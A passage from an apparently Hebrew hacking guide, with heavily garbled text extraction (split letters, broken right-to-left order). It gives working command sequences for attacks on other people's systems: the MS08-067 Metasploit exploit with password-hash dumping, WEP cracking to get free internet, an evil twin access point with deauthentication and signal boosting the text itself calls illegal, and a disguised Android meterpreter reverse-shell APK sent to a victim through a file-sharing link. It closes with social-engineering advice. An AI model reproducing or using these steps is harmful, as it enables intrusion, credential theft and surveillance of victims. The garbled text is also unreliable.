‫)‪ (RHOST‬ו כתו בת ה‪ PI-‬ש ל המ כ שיר ש בו אתה מ שתמ ש ‪(LHOST).‬אםי ש לך את הפר טים הא לה כ בר‪,‬‬
‫אתהי כו ל לה שתמ ש בפ קודות ה באות כדי להגדיר את כתו בות ה‪ PI-‬ע בור הניצו ל‪:‬‬
‫> )‪msf (ms08_067_netapi‬הגדר ‪ ]RHOST‬כתו בת ‪IP‬יעד[‬
‫> )‪msf (ms08_067_netapi‬הגדר ‪ ]LHOST‬כתו בת ה‪ PI-‬ש לך[‬
‫‪ 3.‬כעת‪ ,‬בצע את הניצו ל ע לידי ה ק לדת הפ קודה ה באה‪:‬‬
‫> )‪msf (ms08_067_netapi‬נצ ל‬
‫זהייתן לך הנ חיה מ סוף שתאפ שר לך לג שת למ ח ש ב היעד מר חו ק‪.‬‬
‫‪ 4.‬ק ח את ‪-hash‬ה ש ל ה סי סמה‬
‫מ כיוון שרו ב מער כות ההפע לה והיי שומים נו טים לא ח סן סי סמאות ‪ -hash‬ב למ טרות הצפנה‪,‬יית כן ש לא‬
‫תו כ ל לראות את אי שורי המ שתמ ש שאתה מ חפ ש מיד‪ .‬עם זאת‪ ,‬אתהי כו ל ל ק ב ל את הגי בו בים הא לה‬
‫ו לפר ש אותם מאו חריותר‪ .‬כדי לתפו ס את ‪-hash,‬הה שתמ ש בפ קודה הזו‪:‬‬
‫‪meterpreter > hashdump‬‬
‫לא חר שתזין את זה‪ ,‬תראה את כ ל המ שתמ שים במער כת שאתה פורץ‪ ,‬ואת ה סי סמאות הגו ב בות‪ .‬לא חר‬
‫מ כן תו כ ל לנ סות לפענ ח את הגי בו בים ה ל לו באמצעות כ לים כגון קין וה ב ל‪.‬‬
‫פר ק ‪ 8:‬פריצת חי בורי ר שת‬
‫אמנות הפריצה ל חי בורי ר שת היא ב ק לות א חד מהמע ל לים האהו בים ע ל הא קר‪ .‬ע לידי פריצת חי בורי אינ טרנ ט‪ ,‬הא קרי כו ל‬
‫ב ק לות לה סתיר את זהותו‪ ,‬ליהנות מרו ח ב פ ס חינם להורדות מא סי ביות ו לע שות שימו ש ב חי בור א חר לפעי לויות לא חו קיות‪.‬‬
‫זה גם מאפ שר להא קר לפענ ח את התע בורה ש ל המ שתמ ש ו לתפו ס אותם‪ .‬אתהי כו ל ר ק לדמיין מה מ סוג ל לע שות הא קר‬
‫פ לי לי ברגע שהוא מ שיג את חי בור ‪-Wi-Fi‬ה ש לך ואת הצרות שאתה ע לו ל להיות בהן כ שזהי קרה‪.‬‬
‫לפני שתנ סה ל בדו ק פריצות ל חי בורי אינ טרנ ט‪ ,‬ח שו ב שת בין ת חי לה את רמות הפר טיות ב כ ל הנוגע להגנה ע ל ה חי בור‬
‫הא ל חו טי ש לך‪ .‬רמת ההת קפה שאתה צריך ל בדו ק תהיה ת לויה מאוד ברמת הא ב ט חה ש ל חי בור אינ טרנ ט ממו קד‪ .‬לה לן‬
‫כמה מפרו טו קו לי הא ב ט חה ה ב סי סיים ביותר ב חי בורים א ל חו טיים‪:‬‬
‫)‪1. WEP (Wired Equivalent Privacy‬‬
‫כפי שה שם מרמז‪ ,‬רמת הצפנה זו נועדה ל ספ ק למ שתמ שים פר טיות ע בור חי בור קווי‪ .‬עם זאת‪ ,‬זה ק ל להפ ליא‬
‫לפיצו ח בג ל ל ו ק טור האת חו ל ה ק טן ש לו שניתן ל ל כוד ב ק לות בזרם הנתונים‪ .‬סוג זה ש ל הצפנה זמין בדרך כ ל ל‬
‫ב חי בורים א ל חו טייםי שנים ו במ כ שירים שעדיין לא שודרגו כדי להתאים לפרו טו קו לי א ב ט חת אינ טרנ ט טו ביםיותר‪.‬‬
‫)‪2. WPA (WPA1‬‬
‫פרו טו קו ל א ב ט חה זה נוצר כדי ל טפ ל ב חו ל שות ה קיימות בהצפנת ‪ WEP‬ועו שה שימו ש בפרו טו קו ל )‪(TKIP‬‬
‫‪ Temporal Key Integrity‬כדי ל בצע שיפורים בא ב ט חת ‪ WEP‬מ ב לי לדרו ש מהמ שתמ שים להת קין חומרה חד שה‪.‬‬
‫המ שמעות היא ש ט כנו לוגיה זו עדיין עו שה שימו ש בא ב ט חת ‪-WEP,‬האך לת קוף אותה ק שהיותר‪.‬‬
‫‪3. WPA2-PSK‬‬
‫זה מ שמ ש בדרך כ ל ל ע ס קים ק טנים ומ שתמ שים ביתיים ועו שה שימו ש במפת ח מ שותף מרא ש או ‪PSK.‬אמנם‬
‫פרו טו קו ל זה מאו ב ט ח הר בהיותר מ שני ה קודמים‪ ,‬אך הוא עדיין ח שוף ל כמה ט ק טי קות פריצה‪.‬‬
‫‪4. WPA2-AES‬‬
‫זוהי הגר סה הארגונית ש ל פרו טו קו ל ‪WPA,‬העו שה שימו ש )‪ -Advanced Encryption Standard (AES‬ב להצפנת‬
‫נתונים‪ .‬כא שר אתה רואה שארגון מ שתמ ש ב סוג זה ש ל א ב ט חה‪ ,‬אתהי כו ל גם לצפות שהוא מגיע עם שרת‬
‫‪ RADIUS‬לאימות נו סף‪ .‬פרו טו קו ל זהי כו ל להיות ק שה מאוד לע קוף‪ ,‬אך עדיין ניתן לפצ ח אותו‪.‬‬
‫פריצת חי בור ‪WEP‬‬
‫כאן תג לו כיצד ניתן לפרוץ ב ק לות חי בור עם רמת א ב ט חה נמו כה‪ .‬כדי לנ סות את הפריצה הזו‪ ,‬תזד ק ק למתאם א ל חו טי‪,‬‬
‫‪-BackTrack.‬ו ‪ aircrack-ng‬ברגע שי ש לך את ה כ לים הא לה‪ ,‬בצע את ה ש ל בים ה באים‪:‬‬
‫‪ 1.‬טען את ‪ -Backtrack‬ב ‪aircrack-ng‬‬
‫לא חר שתפעי ל את ‪ Backtrack,‬ח בר את המתאם הא ל חו טי ש לך ו בדו ק אם הוא פוע ל‪ .‬כדי לע שות זאת‪ ,‬הזן את‬
‫הפ קודה‪:‬‬
‫‪Iwconfig‬‬
‫לא חר שתע שה זאת‪ ,‬תו כ ל לראות אם המתאם ש לך מזוהה‪ .‬אתה ע שוי לראות את זה בתור ‪ wlan0, wlan1‬ו כן‬
‫ה לאה‪.‬‬
‫‪2.‬הנ ח את המתאם הא ל חו טי במצ ב מופ קר‬
‫כעת‪ ,‬חפ ש את ה חי בורים הזמינים ב קר בת מ קום ע לידי הצ בת המתאם הא ל חו טי ש לך למצ ב צג או למצ ב מופ קר‪.‬‬
‫כדי לע שות זאת‪ ,‬הזן את הפ קודה ה באה‪:‬‬
‫‪airmon-ng‬הת ח ל את ‪wlan0‬‬
‫לא חר שתע שה זאת‪airmon-ng ,‬י שנה את שם הממ ש ק ש לך ל‪ .0nom-‬ברגע שתצ לי ח להצי ב את המתאם‬
‫הא ל חו טי ש לך למצ ב צג‪ ,‬תו כ ל ל ל כוד את התע בורה הזמינה ע לידי הזנת הפ קודה ה באה‪:‬‬
‫‪airodump-ng mon0‬‬
‫כעת‪ ,‬תו כ ל לראות את כ ל נ קודות הגי שה וה ל קו חות התואמים ש להן שנמצאים כו לם בפנים‬
‫ה טוו ח ש לך‪.‬‬
‫‪3.‬הת ח ל לצ לם בנ קודת גי שה מ סוימת‬
‫אם אתה רואה ‪BSSID‬או ‪ ESSID‬שי ש להם הצפנת ‪WEP,‬אתה כ בר מ ק ב ל את הרעיון שזהיהיה ה חי בור שה כי ק ל‬
‫לפצ ח בר שימת ה‪ sPA-‬שהצ ל חת ל ל כוד‪ .‬כעת‪ ,‬העת ק את ‪-BSSID‬ה ש ל ‪-AP‬ה שנ ב חר והת ח ל ל ל כוד באמצעות‬
‫הפ קודה הזו‪:‬‬
‫‪ airodump-ng --bssid [BSSID‬ש ליעד[ ‪]-c‬מ ספר ערוץ[ ‪-w WEPcrack mon0‬‬
‫לא חר הזנת הפ קודה‪Backtrack ,‬ית חי ל ל ל כוד מנות מנ קודת הגי שה הממו קדת בערוץ המ סוים ש לה ו לא חר מ כן‬
‫ל כתו ב את ‪-WEPcrack‬ה בפורמ ט ש ל ‪pcap.‬זהיאפ שר לך ל ק ב ל את כ ל ה ח בי לות שאתה צריך כדי לפענ ח את‬
‫מפת ח ה סי סמה המ שמ ש ב חי בור שא ליו אתה רוצה להת ח בר‪ .‬עם זאת‪ ,‬ק ב לת מ ספי ק מנות לפענו ח ע שויה להימ שך‬
‫זמן ר ב‪ .‬אם אתה לאי כו ל ל ח כות‬
‫ל ק ב ל מ ספי ק מנות‪ ,‬אתהי כו ל להזרים תע בורת ‪ ARP‬במ קום זאת‪.‬‬
‫‪4.‬הזר קת ‪ARP Traffic‬‬
‫אם אין לך ס ב לנות לה שיג מ ספי ק מנות ע בור ל כידת ‪WEPkey,‬אתהי כו ל ל ל כוד ח בי לת ‪ ARP‬ו לא חר מ כן להפעי ל‬
‫אותה מ ספר פעמים כדי ל ק ב ל את כ ל ‪-IVs‬ה שאתה צריך ל ק ב ל כדי לפצ ח את ‪ WEPkey.‬מ כיוון ש כ ברי ש לך את‬
‫‪-BSSID‬ה ואת כתו בת ה‪ CAM-‬ש ל היעד )ניתן לא סוף את שניהם ב ש ל ב ‪3),‬הזן את הפ קודה ה באה‪:‬‬
‫‪ ]aireplay-ng -3 -b [BSSID] -h‬כתו בת ‪MAC] mon0‬‬
‫כעת‪ ,‬אתהי כו ל להזרי ק את ה‪ sPRA-‬שנ ל כדוי שירות לנ קודת הגי שה ש ל היעד‪ .‬כ ל מה שאתה צריך לע שות ע כ שיו‬
‫הוא ל ל כוד את ‪-IVs‬ה שייווצרוי שירות לתוך האיירו‪.pmud‬‬
‫‪ 5.‬פצ ח את מפת ח ‪-WEP‬ה‬
‫ברגע שתצ לי חו לה חזי ק מ ספי ק ‪ IVs‬ב קו בץ ‪WEPcrack,‬תו כ לו להריץ את ה קו בץ ‪ -aircrack-ng‬ב ע לידי הזנת הפ קודה‬
‫ה באה‪:‬‬
‫‪ ]aircrack-ng‬שם ה קו בץ‪ecample:WEPcrack-01.cap] ,‬‬
‫‪-aircrack-ng‬ה בדרך כ ל ליזין את המפת ח במ סך ש לך בפורמ ט ה ק סדצימ לי‪ .‬כ ל מה שאתה צריך לע שות הוא לה חי ל‬
‫את המפת ח הזה בנ קודת הגי שה המרו ח קת כדי ליהנות מהאינ טרנ ט ה חינמי ש לך‪.‬‬
‫‪The Evil Twin Hack‬‬
‫בעוד שהא קרים מת חי לים ר בים מת לה בים לפרוץ סי סמאות ‪ Wi-Fi‬כדי ליהנות מרו ח ב פ ס חופ שי‪,‬י שנן פריצות ל חי בורי ר שת‬
‫שהן חז קותיותר ומ ספ קות גי שה טו בהיותר מ חי בור לאינ טרנ ט ב חינם‪ .‬בין הפריצות ה ל לו ניתן למצוא את פריצת נ קודת הגי שה‬
‫התאומה המרו שעת‪.‬‬
‫ה‪Evil Twin AP -‬הוא נ קודת גי שה מניפו ל טי בית המופיעה ומתנהגת כמו נ קודת גי שה רגי לה שמ שתמ ש מת ח בר א ליה כדי‬
‫להת ח בר לאינ טרנ ט‪ .‬עם זאת‪ ,‬הוא מ שמ ש בדרך כ ל ל ע לידי הא קרים כדי להפוך קור בנות ממו קדים לנ קודת הגי שה ש להם‪ .‬זה‬
‫מאפ שר להא קר לראות את כ ל התע בורה שמגיעה מה ל קו ח‪ ,‬מה שמפנה את מ קומו למת קפה מ סו כנת מאוד ש ל אי ש‪ -‬באמצע‪.‬‬
‫בצע את ה ש ל בים כדי ל בצע הת קפת נ קודת גי שה תאומה מרו שעת‪:‬‬
‫‪1.‬הפע ל את ‪ Backtrack‬והת ח ל ‪Airmon-ng.‬‬
‫בדו ק אם ה כר טי ס הא ל חו טי פוע ל ע לידי הזנת הפ קודה‪:‬‬
‫‪bt > iwconfig‬‬
‫‪2.‬ה כנ ס את ה כר טי ס הא ל חו טי למצ ב צג‬
‫ברגע שאתה רואה שה כר טי ס הא ל חו טי מזוהה ע לידי ‪Backtrack,‬הצ ב אותו במצ ב צג או מופ קר ע לידי הזנת‬
‫הפ קודה‪:‬‬
‫‪bt >airmon-ng‬הת ח ל ‪wlan0‬‬
‫‪3.‬‬
‫הפע ל אוויר ‪dump-ng‬‬
‫הת ח ל ל ל כוד את כ ל התע בורה הא ל חו טית שה כר טי ס הא ל חו טיי כו ל לזהות ע לידי הזנת הפ קודה‪:‬‬
‫‪bt > airodump-ng mon0‬‬
‫לא חר שתע שה זאת‪ ,‬תו כ ל לראות את כ ל נ קודות הגי שה ב טוו ח‪ .‬אתר את נ קודת הגי שה ש ל היעד ש לך‬
‫‪4.‬‬ ‫המתן עד שהמ טרה תת ח בר‬
‫לא חר שהיעד מת ח בר לנ קודת הגי שה‪ ,‬העת ק את ‪-BSSID‬ה ואת כתו בת ה‪ CAM-‬ש ל המער כת ש ברצונך לפרוץ‪.‬‬
‫צור נ קודת גי‪5.‬שה עם אותו הד בר‬

‫אי שורים‬
‫מ שוך מ סוף חד ש וה ק לד את הפ קודה הזו‪:‬‬
‫‪ bt > airbase-ng -a [BSSID] --essid ["SSID‬ש ל היעד"[ ‪]-c‬מ ספר ערוץ[ ‪mon0‬‬
‫זהיצור את נ קודת הגי שה‪ ,‬או התאום המרו שע‪ ,‬שא ליה תרצה שהיעד ש לךית ח בר‪.‬‬
‫‪6.‬‬ ‫ב ט ל אימות ש ל המ טרה‬

‫כדי שהואית ח בר לנ קודת הגי שה ש ל התאומים המרו שעים‪ ,‬אתה צריך להדוף את המ טרה מנ קודת הגי שה שא ליה‬
‫הוא מ חו בר‪ .‬מ כיוון שרו ב ה חי בורים הא ל חו טיים תואמים ל‪ 11.208-‬שי ש לו פרו טו קו ל בי טו ל אימות‪ ,‬נ קודת הגי שה‬
‫ש לו ת ב ט ל את האימות ש ל כ ל מי שמ חו בר א ליה‪ .‬כא שר המ ח ש ב ש ל היעדינ סה להת ח בר מ חד ש לאינ טרנ ט‪ ,‬הוא‬
‫ית ח בר או טומ טית ‪ -AP‬ל עם האות ה חז ק ביותר‪ ,‬שהוא נ קודת הגי שה התאומה המרו שעת שיצרת זה עתה‪.‬‬
‫ע ל מנת לע שות זאת‪ ,‬ע ליך לה שתמ ש בפ קודה ה באה‪:‬‬
‫‪ bt > aireplay-ng --deauth 0 -a [BSSID‬ש ליעד[‬
‫‪7.‬‬ ‫הג ביר את האות ש ל התאום הר שע‬
‫ע כ שיו‪ ,‬הנה ה ח ל ק המ כריע ‪ -‬ע ליך לוודא שהאות ש ל נ קודת הגי שה המזויף שיצרת זה עתה חז ק או חז קיותר‬
‫מנ קודת הגי שה המ קורית‪ .‬מ כיוון שאתה תו קף מר חו ק‪ ,‬אתה כמע טי כו ל לה סי ק ש ל חי בור ‪-WiFi‬ה ש לוי ש אות הר בה‬
‫יותר חז ק מ ש לך‪ .‬עם זאת‪ ,‬אתהי כו ל לה שתמ ש בפ קודה ה באה כדי להג ביר את האות‪:‬‬
‫‪iwconfig wlan0 txpower 27‬‬
‫הזנת פ קודה זו תג ביר את הה ספ ק ש ל נ קודת הגי שה ש לך ב‪ 005-‬מי ליווא ט‪ ,‬או ‪27 dBm.‬‬
‫עם זאת‪ ,‬שימו ל ב כי בהתאם למר ח ק ש ל כם מהמ טרה‪,‬יית כן ש‪ 005-‬מי ליווא ט לאי ספי קו לו כדי להי שאר מ חו בר‬
‫לתאום המרו שע‪ .‬עם זאת‪ ,‬אםי ש לך כר טי ס א ל חו טי חד שיותר‪ ,‬תו כ ל להג ביר את האות ש ל נ קודת הגי שה עד‬
‫ל‪ 0002-‬מי ליווא ט‪ ,‬או פי אר בעה ממה שמ קו ב ל בארה" ב‪.‬‬
‫‪8.‬‬ ‫שנה את הערוץ ש לך‬
‫ש ל ב זה מגיע עם אזהרה‪ :‬זה לא חו קי לה ח ליף ערוצים בארה" ב‪ ,‬ו לפני שתמ שיך‪ ,‬וודאו שי ש ל כם אי שור מיו חד בתור‬
‫הא קר אתי‪.‬‬
‫י שנן מדינות מ סוימות המאפ שרות כו ח ‪ Wi-Fi‬טו ביותר‪ ,‬מה שי כו ל ל סייע לך ב שמירה ע ל עוצמת האות ש ל נ קודת‬
‫הגי שה התאומה המרו שעת ש לך‪ .‬לדוגמה‪ ,‬בו לי ביה מאפ שרת למ שתמ שי האינ טרנ ט ש לה לג שת לערוץ ‪-Wi-Fi 12,‬ה‬
‫שמגיע עם ה ספ ק מ לא ש ל ‪ 1000‬מי ליווא ט‪ .‬כדי ל שנות את ערוץ האות ש ל ה כר טי ס הא ל חו טי ש לך כך שיתאים לא לו‬
‫ש ל בו לי ביה‪ ,‬הזן את הפ קודה ה באה‪:‬‬
‫‪iw reg set BO‬‬
‫מ כיוון שהערוץ ש לךיאפ שר לך כעת להג ביר את העוצמה ש ל נ קודת הגי שה ש לך‪ ,‬אתהי כו ל להג ביר עודיותר את‬
‫האות ש ל התאום המרו שע ש לך ע לידי הזנת הפ קודה‪:‬‬
‫‪iwconfig wlan0 txpower 30‬‬
‫כעת‪ ,‬בדו ק את העוצמה ש ל נ קודת הגי שה ש ל התאום הר שע ע לידי ה ק לדת ‪iwconfig.‬‬

‫‪9.‬‬ ‫נצ לו את התאום המרו שע במ לואו‬
‫כעת‪ ,‬לא חר שה קמתם במ לואו את ‪AP‬התאום הר שע וה ב ט חתם שהמ טרה ש ל כם מ חו ברת א ליו‪ ,‬תו כ לו לנ קו ט‬
‫בצעדים ה באים כדי לזהות פעי לויות במער כת ש לו‪.‬‬
‫אםי ש לך את ה כ לי ‪Ettercap,‬אתהי כו ל ב ק לות ל בצע מת קפת אי ש‪ -‬באמצע כדי לנת ח נתונים שהוא שו ל ח או‬
‫מ ק ב ל‪ ,‬לייר ט את כ ל התע בורה‪ ,‬או אפי לו להזרים את התע בורה שאתה רוצה שהואי ק ב ל‪ .‬אתהי כו ל גם ליצור‬
‫מאזיןי שירות לתוך המער כת ש לו כדי לה שיג ש לי טה מו ח ל טת‪.‬‬
‫פר ק ‪ 9:‬מ בוא לפריצה לנייד‬
‫פריצה לנייד הגיונית ל ח לו טין בג ל ל ע לייתם ש ל סמאר טפונים ומ כ שירים ניידים א חרים לע ס קאות מ קוונות ו ל חי בור עם א חרים‪.‬‬
‫מ כיוון שמ כ שירים ניידים הם מו קדים ש ל מידע אי שי ש ק ליותר לג שת א ליהם בה שוואה למ ח ש בים אי שיים‪ ,‬הם מהמ כ שירים‬
‫הפגיעים ביותר ע בור הא קרים‪.‬‬
‫למה כדאי לפרוץ למ כ שירים ניידים? סוגים שונים ש ל פריצות למ כ שירים ניידים מאפ שרים לך ל בצע את הפעו לות ה באות‪:‬‬
‫‪1.‬דע את מי קומו ש ליעד באמצעות שירות ‪ GPS‬מות קן או מע ק ב א חר מזהה ס לו לרי‪.‬‬
‫‪2.‬גי שה למיי לים וה ק ל טת שי חות ט לפון‬
‫‪3.‬דע את התנהגות הג לי שה באינ טרנ ט ש ליעד‬
‫‪4.‬הצג את כ ל התו כן המאו ח סן במ כ שיר‪ ,‬כו ל ל תמונות‬

‫‪ 5.‬ש ל ח הוראות מר חו ק למ כ שיר הנייד‬
‫‪6.‬ה שתמ ש בו כדי ל ש לו ח הודעות מזויפות או שי חות‬

‫פריצת אפ לי קציות לנייד‬
‫אם אתה חו ש ב כמו הא קר‪ ,‬ת בין שא חת הדר כים ה ק לות ביותר להי כנ ס למ ספר מ כ שירים ניידים ו להת קין שם חנות היא ליצור‬
‫אפ לי קציה לנייד‪.‬‬
‫פריצת אפ לי קציות לנייד היא בין הדר כים המהירות ביותר ל חדור למער כת מ כ שירים ניידים ש כן ק ל להע לות אפ לי קציה זדונית‬
‫באינ טרנ ט ו לאפ שר לאנ שים להוריד את הפריצה‪ ,‬אפי לו ב לי ל ח שו ב אם ע ליהם ל ב חון את ההורדה ש להם או לא‪ .‬אפ לי קציות לנייד‬
‫נ ח ש בות גם כ"פרי ת לוי נמוך"‪ .‬לרו ב האפ לי קציות הניידות ניתן לג שתי שירות דרך ה קודים ה בינאריים ש להן‪ ,‬או ה קוד שמ כ שירים‬
‫ניידים צרי כים כדי להפעי ל את האפ לי קציה‪ .‬זה אומר ש כ ל מי שי ש לויד ע ל כ לי פריצה מ שוו קים מ סוג ל לנצ ל אפ לי קציות ניידות‬
‫זמינות ו להפוך אותן ל כ לי פריצה‪ .‬ברגע שהא קריםיצ לי חו להתפ שר ע ל אפ לי קציה לנייד‪ ,‬הםיו כ לו ל בצע את הפ שרה הרא שונית‬
‫תוך ד קות‪.‬‬
‫הנה כמה דר כים כיצד הא קרים מנצ לים קודים בינאריים באפ לי קציות לנייד‪:‬‬
‫‪ 1.‬שנה את ה קוד כדי ל שנות את ההתנהגות‬
‫כא שר הא קרים מ שנים את ה קוד ה בינארי‪ ,‬הם עו שים זאת כדי לה ש בית את ב קרות הא ב ט חה ש ל האפ לי קציה‪ ,‬דרי שות‬
‫ר כי שה או הנ חיות להצגת מודעות‪ .‬כא שר הם מ סוג לים לע שות זאת‪ ,‬הםי כו לים להפיץ את האפ לי קציה ש שונתה בתור‬
‫קרא ק‪ ,‬אפ לי קציה חד שה או תי קון‬
‫‪2.‬הזר קת קוד זדוני‬
‫כא שר הא קרים מצ לי חים ל שים אתידם ע ל קוד בינארי‪ ,‬הםי כו לים לה חדיר בו קוד זדוני ואז להפיץ אותו כעד כון אפ לי קציה‬
‫או כתי קון‪ .‬פעו לה זו ע לו לה ל ב ל ב ל מ שתמ ש ל ח שו ב שהוא ר ק מעד כן את האפ לי קציה במ כ שיר הנייד ש לו‪ ,‬א ב ל למע שה‪,‬‬
‫ההא קר הנד ס את המ שתמ ש להת קין אפ לי קציה א חרת לגמרי‪.‬‬
‫‪3.‬צור אפ לי קציה סוררת‬
‫הא קריםי כו לים ל בצע מת קפת ‪ Drive-by,‬מה שמתאפ שר ע לידי ביצוע ה‪/IPA-‬פונ קציה ‪hooking‬או ‪ swizzling.‬כא שר‬
‫זה נע שה‪ ,‬ההא קריו כ ל ל ס כן בהצ ל חה את האפ לי קציה הממו קדת ו לאפ שר הפניית התנועה או גני בת אי שורי מ שתמ ש‪.‬‬
‫‪ 4.‬ע שה הנד סה לא חור‬
‫הא קר שי ש לו גי שה ל קוד בינאריי כו ל ב ק לות ל בצע פריצה ש ל הנד סה לא חור כדי ל ח שוף נ קודות תורפה נו ספות‪ ,‬ל בצע‬
‫אפ לי קציות זיוף דומות‪ ,‬או אפי לו ל ש לו ח אותו מ חד ש ת חת מיתוג חד ש‪.‬‬
‫ניצו ל מ כ שיר נייד מר חו ק‬
‫‪ Kali Linux,‬ער כת כ ליםידועה לניצו ל מ ח ש בים‪ ,‬היא גם א חד ה כ לים היעי לים ביותר ל ביצוע פריצה במ כ שיר נייד‪ .‬בצע את‬
‫ה ש ל בים ה באים כדי ל בצע פריצה מר חו ק במ כ שיר נייד ו להת קין קו בץ זדוני במ כ שיר ממו קד‪.‬‬
‫‪ 1.‬מ שוך למע לה את ‪Kali Linux‬‬
‫ה ק לד את הפ קודה ה באה‪:‬‬
‫‪ ]=TSOHLmsfpayload android/meterpreter/reverse_tcp‬כתו בת ה‪ PI-‬ש ל המ כ שיר ש לך[ ‪Upgrader.apk‬‬

‫‪R > /root/‬‬
‫‪ 2.‬מ שוך למע לה מ סוף חד ש‬
‫בזמן ש קא לייוצר את ה קו בץ ש לך‪ ,‬טען מ סוף א חר ו טען את קונ סו לת ‪ metasploit.‬כדי לע שות זאת‪ ,‬הזן את הפ קודה‪:‬‬
‫‪Msfconsole‬‬
‫‪3.‬הגדר את המאזין‬
‫לא חר שה‪ tiolpsatem-‬נגמר‪ ,‬טען את הניצו ל ש ל רי בוי מ טפ לים ע לידי הזנת הפ קודה‪:‬‬
‫ה שתמ ש ‪ -exploit/multi/handler‬ב‬
‫לא חר מ כן‪ ,‬צור את המ טען ההפוך ע לידי ה ק לדת הפ קודה ה באה‪:‬‬
‫הגדר מ טען ‪android/meterpreter/reverse_tcp‬‬
‫לא חר מ כן‪ ,‬תצ טרך להגדיר את סוג המאר ח ‪ L‬כדי שתו כ ל להת חי ל ל ק ב ל תע בורה‪ .‬כדי לע שות זאת‪ ,‬ה ק לד את הפ קודה‬
‫ה באה‪:‬‬
‫הגדר ‪ ]LHOST‬כתו בת ה‪ PI-‬ש ל המ כ שיר ש לך[‬
‫‪4.‬‬ ‫הת ח ל את הניצו ל‬
‫כעת‪ ,‬לא חר שהמאזין ש לך מו כן‪ ,‬כעת תו כ ל להת חי ל את הניצו ל ש לך ע לידי הפע לת המאזין ש לך‪.‬‬
‫כדי לע שות זאת‪ ,‬ה ק לד את הפ קודה‪:‬‬
‫לְנַצֵ ל‬
‫אם ה קו בץ הזדוני או ה טרויאני שיצרת לפני זמן מה מו כן‪ ,‬העת ק אותו מתי קיית ה שור ש למ כ שיר הנייד ש לך‪ ,‬רצוי ל ט לפון‬
‫אנדרואיד‪ .‬לא חר מ כן‪ ,‬הפוך את ה קו בץ לזמין ע לידי הע לאתו ל כ ל אתר שיתוף ק בצים כגון ‪speedyshare‬או ‪Dropbox.‬‬
‫ש ל ח את ה קי שור ליעד ש לך‪ ,‬ו ב ק ש ממנו להת קין את האפ לי קציה‪.‬‬
‫לא חר שמ שתמ ש היעד ש לך הת קין את ה קו בץ‪ ,‬כעת תו כ ל ל ק ב ל את התע בורה שהוא מ ק ב ל דרך המ כ שיר הנייד‬
‫ש לו!‬
‫פר ק ‪10:‬הנד סה ח ברתית‬
‫הנד סה ח ברתית היא א חת הפריצות ה ח שו בות ביותר שניתן ל בצע ע ל מנת לפרוץ באמצעות פרו טו קו לי א ב ט חה‪ .‬עם זאת‪,‬‬
‫לא מדו בר בפריצה שמת בצעת כנגד מער כת מ ח ש ב עצמה; במ קום זאת‪ ,‬מדו בר בפריצה שמת בצעת נגד אנ שים‪ ,‬שי כו לה‬
‫להיות ה חו ליה ה ח ל שה ביותר ב שר שרת ש ל אמצעי א ב ט חה‪.‬‬
‫הנד סה ח ברתית‪ ,‬הידועה גם ב שם "פריצות לאנ שים"‪ ,‬היא א חת הפריצות ה ק שות ביותר ל ביצוע מ כיוון ש לא נפוץ שאנ שים‬
‫נותנים מידע מ סווג לאדם זר מו ח ל ט‪ .‬עם זאת‪ ,‬זה אפ שרי ע בור כ ל הא קר מנו סה להעמיד פנים שהוא מי שהו שאתהי כו ל‬
‫ל סמוך ע ליו כדי ל ק ב ל גי שה למ סמ כים ו סי סמאות ח שו בות‪ .‬כ ל מה שנדר ש להא קר פ לי לי מנו סה ל בצע ט ק טי קה ש ל הנד סה‬
‫ח ברתית הוא ל ק ב ל את המידע הנ כון ע ליך‪.‬‬
‫הנד סה ח ברתית כאמנות ומדע‬
‫ההיגיון מא חורי ההנד סה ה ח ברתית הוא פ שו ט ‪-‬זהי כו ל להיות ק ל ל ק ב ל את כ ל המידע והגי שה שאדם צריך מ כ ל אדם כ ל עוד אתהיודע איך‬
‫להערים ע ל אדם לתת לך את הנתונים שאתה צריך במינימום התנגדות‪ .‬ע לידיי כו לת להוציא טרי ק ש ל הנד סה ח ברתית‪ ,‬תו כ ל ל שיםיד ע ל מ כ שיר‪,‬‬
‫ח ש בון או אפ לי קציה שאתה צריך לג שת א ליהם כדי ל בצע פריצות גדו לותיותר או ל ח טוף זהות ל ח לו טין‪ .‬זה אומר שאם אתה מ סוג ל לממ ש ט ק טי קה‬
‫ש ל הנד סה ח ברתית לפני שאתה מנ סה לע בור את כ ל ט ק טי קות ה ח טיפה הא חרות ב שרוו ל ש לך‪ ,‬אתה לא צריך לע שות מאמץ נו סף כדי ל חדור‬
‫למער כת‪ .‬אם לנ ס ח את כ ל התפי סה הזו במונ חים פ שו טיםיותר‪ ,‬הנד סה ח ברתית היא סוג ש ל פריצה העו ס קת במניפו לציה ש ל קור בנות באמצעות‬
‫אינ טרא קציה ח ברתית‪ ,‬במ קום צורך לפרוץ מיד למער כת מ ח ש בים‪.‬‬
‫מה שמ ק שה ע ל הנד סה ח ברתית הוא שהיא מ בו ס סת במידה ר בה ע ל הי כו לת לה ב טי ח אמון‪ ,‬מה שמתאפ שר ר ק ע לידי ק ב לת אמון ש ל מי שהו‪.‬‬
‫מ סי בה זו‪ ,‬ההא קרים המצ לי חים ביותר מ סוג לים ל קרוא תגו בות אפ שריות מאדם ב כ ל פעם שהם מופע לים ל בצע פעו לה כ ל שהי בי ח ס למער כת‬
‫הא ב ט חה ש להם‪ .‬ברגע שתצ לי ח ל בצע את הת חזיות הנ כונות‪ ,‬תו כ ל ל ק ב ל סי סמאות ונ כ סי מ ח ש בי קרי ערך א חרים מ ב לי שתצ טרך לה שתמ ש ביותר‬
‫מדי כ לים‪.‬‬
‫מ כיוון שהנד סה ח ברתית עו ס קת בעי קר בפ סי כו לוגיה‪ ,‬אתהי כו ל ל ש קו ל את ה ט ק טי קה הזו כאומנות וגם כמדע‪ .‬ט ק טי קה זו כו ל לת מידה ר בה ש ל‬
‫יצירתיות וי כו לת לפענ ח שפה לא מי לו לית ש ל בע ל מ כ שיר או ח ש בון‪ .‬מומ חי הנד סה ח ברתית מ סוג לים להר כי ב ט ק טי קות שנראות כמו עו בדות נגד‬
‫מ שתמ שי מ ח ש ב כ ל הזמן‪.‬‬
‫י חד עם סוגים א חרים ש ל פריצות זמינות‪ ,‬ת בינו שהנד סה ח ברתית היא ח ל ק מההת קפות המוצ ל חות ביותר‪ ,‬ו שהת קפות עו בדות בעי קר בג ל ל צורה‬
‫כ ל שהי ש ל ת ח בו לה נפ שית שמ בצע הא קר‪ .‬הנד סה ח ברתית מאפ שרת לאדם פ שו ט להי כנ ס למידע אי שי ב כ ל צורה שהוא רואה‪ ,‬או לפתו ח‬
‫ב חופ שיות קו בץ מצורף שה טמיע תו כנה זדונית‪.‬‬
